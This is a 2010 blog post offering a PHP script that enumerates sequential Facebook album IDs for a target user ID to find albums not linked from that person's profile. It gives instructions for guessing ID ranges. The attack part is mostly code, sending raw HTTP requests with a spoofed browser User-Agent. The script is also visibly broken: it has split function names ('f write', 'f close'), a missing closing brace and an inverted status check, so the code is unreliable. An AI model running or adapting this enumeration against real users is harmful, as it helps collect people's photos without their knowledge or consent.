Nov 06 2010

Facebook ‘hacking’

Category: Linux,PHP,pseudo-hacks,Socialguillem @ 4:05 AM

The ‘hacking’ on the title is in quotation marks because this isn’t something amazing. What i want to show you is a little script in PHP i did a while ago which allows to gather a facebook album addresses from a specified profile. Obviously that person shouldn’t have the album restricted because in such case, you won’t be able to see anything. But in the case the album is not restricted you can see complete albums that you would not  be able to access directly from facebook.  So you should take this only as a script for ‘deofuscation’ more than a ‘hack’.

You should modify 3 parameters in the script itself:

– $uid: corresponds to the facebook user identifier of the person owning the album you want to look for.

– $from y $to: those represents the album identifier margins where script should search between. Those are the most difficult parameters to approach. From what i’ve been able to see, the album identifiers get assigned sequentially to every new album. The best way to approach its value is to search some of your friends profile with an ID similar to the previous uid and look at one of his/her albums and try to use values of from and to around the album id you just got (500 down and up at least). This is not a very cientific approach, but it works and i can’t provide a better one at the moment. Maybe some day i will try to automatize the script to estimate also ‘from’ and ‘to’ but that will be in the future…

//Set User ID here
$uid = 4;
//Album ID to start from. 'Guessing' required...
$from = 1;
//Album ID to finish at. 'Guessing' required...
$to = 500;

$server = gethostbyname( 'www.facebook.com' );

for ( $ii = $from; $ii < $to; $ii++ )
{
sockAccess( $ii );
}

function sockAccess($ii)
{
global $uid;
$page = "album.php?aid=$ii&id=$uid";
global $server;
$errno = '';
$errstr = '';
$fp = 0;
$fp = fsockopen( $server, 80, $errno, $errstr, 30 );
if( $fp === 0 )
die( "Error $errstr ($errno)" );

$out = "GET /$page HTTP/1.1\r\n";
$out .= "Host: $server\r\n";
$out .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1";
$out .= " en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$out .= "Connection: Close\r\n\r\n";
f write( $fp, $out );
$content = fgets( $fp );
$code = trim( substr( $content, 9, 4 ) );
f close( $fp );
if( $code != 200 )
echo "Album found!: http://www.facebook.com/album.php?aid=$ii&id=$uid\n";
if( !($ii%10) )
echo "Trying around: $ii\n";
return true;

Tags: , , ,